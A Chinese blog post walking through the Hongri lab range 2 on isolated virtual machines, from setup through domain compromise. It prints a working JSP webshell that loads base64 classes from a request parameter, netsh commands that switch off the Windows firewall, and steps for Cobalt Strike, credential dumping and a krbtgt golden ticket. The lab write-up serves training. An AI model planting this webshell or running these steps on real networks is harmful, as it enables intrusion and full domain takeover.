Always keep a be|

都吃泡芙

园龄:9个月粉丝:4关注:4

红日靶场2-渗透过程

一、环境搭建

注意:靶机通用密码: 1qaz@WSX

这里设置两个网卡
image

三台虚拟机配置如下:

kali机:192.168.230.131(VMnet8 网卡随机分配的IPPC机:192.168.230.201(外网ip),10.10.10.201(内网ipDC机:10.10.10.10(域控)
WEB机:192.168.230.80(外网),10.10.10.80(内网)

(1)PC机配置

PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。
image
进去之后查看网卡,会有账户控制窗口弹出,账户密码:administrator/1qaz@WSX
image
这里需要使用我们自己的nat网段
image
配置成功
image

(2)DC机配置

DC主机只有一张网卡
image
image

(3)WEB机配置

WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络

image

这里WEB主机以administrator第一次登录时没有密码,登录后会要求重新设置密码
(这里我设置的是1qaz@wsx)

image

这里和PC机操作一样

image

进入目录C:\Oracle\Middleware\user_projects\domains\base_domain,运行statweblogic服务。注意要以管理员身份运行

image

二、外网渗透

(1)信息收集

探测一下存活主机
image

使用goby对目标进行扫描,开放了一些高危端口,3389,7001,445

image

image

goby探测出有weblogicRCE漏洞

image

(2)weblogic漏洞利用

使用weblogic漏洞利用工具RCE

image

上传shell,路径选择
1、把shell写到控制台images目录中

上传路径:C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp

这里需要访问:http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp

2、写到uddiexplorer目录中

路径:C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp

访问:http://*.*.*.*:7001/uddiexplorer/shell.jsp

3:在应用安装目录中

路径:C:\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp

访问:http://*.*.*.*:7001/项目名/shell.jsp

这里我们尝试第一种,使用的蚁剑jsp一句话木马

<%!
class U extends ClassLoader {
    U(ClassLoader c) {
        super(c);
    }
    public Class g(byte[] b) {
        return super.defineClass(b, 0, b.length);
    }
}

public byte[] base64Decode(String str) throws Exception {
    try {
        Class clazz = Class.forName("sun.misc.BASE64Decoder");
        return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
        Class clazz = Class.forName("java.util.Base64");
        Object decoder = clazz.getMethod("getDecoder").invoke(null);
        return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
    }
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
    new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>

image

蚁剑成功连接

image

关闭防火墙

netsh advfirewall show all state  		  //查看防火墙状态
netsh firewall set opmode disable             #winsows server 2003 之前
netsh advfirewall set allprofiles state off   #winsows server 2003 之后

image

三、内网渗透

(1)cs上线

cs生成木马,蚁剑执行木马上线cs

image

cs上提权成功

image

(2)内网信息收集

shell ipconfig /all   收集域 ip

发现机器有双网卡,内网 10.10.10.1/24 网段,域控 ip 10.10.10.10(域控一般是本机的DNS服务器)

image

内网存活主机探测加端口扫描

portscan 10.10.10.0/24

发现都开着445,3389端口

image

收集账户密码

image
image

(3)横向移动

1、rdesktop(3389rdp远程连接)

image

成功连接

image

因为其它两台主机都开启了3389,所以可以 以192.168.230.80作为跳板连接其它两台主机

image

image

2、利用cs

新建一个 Listener,选择之前获取到的凭据信息(明文密文均可),选择 Listener 及主机 Session

image

image

image

DC成功上线:

image

(4)权限维持

黄金票据

从DC中hashdump出krbtgt的hash值,krbtgt用户是域中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

image

在DC查看域的sid,使用mimikatz

image

在WEB机 Administrator 权限机器生成黄金票据

image

image

直接远程连接dir域控c盘成功

shell dir \\10.10.10.10\c$

image

本文作者:都吃泡芙

本文链接:https://www.cnblogs.com/pa0fu/p/18298322

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   都吃泡芙  阅读(68)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
//雪花飘落效果 //雪花飘落效果
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起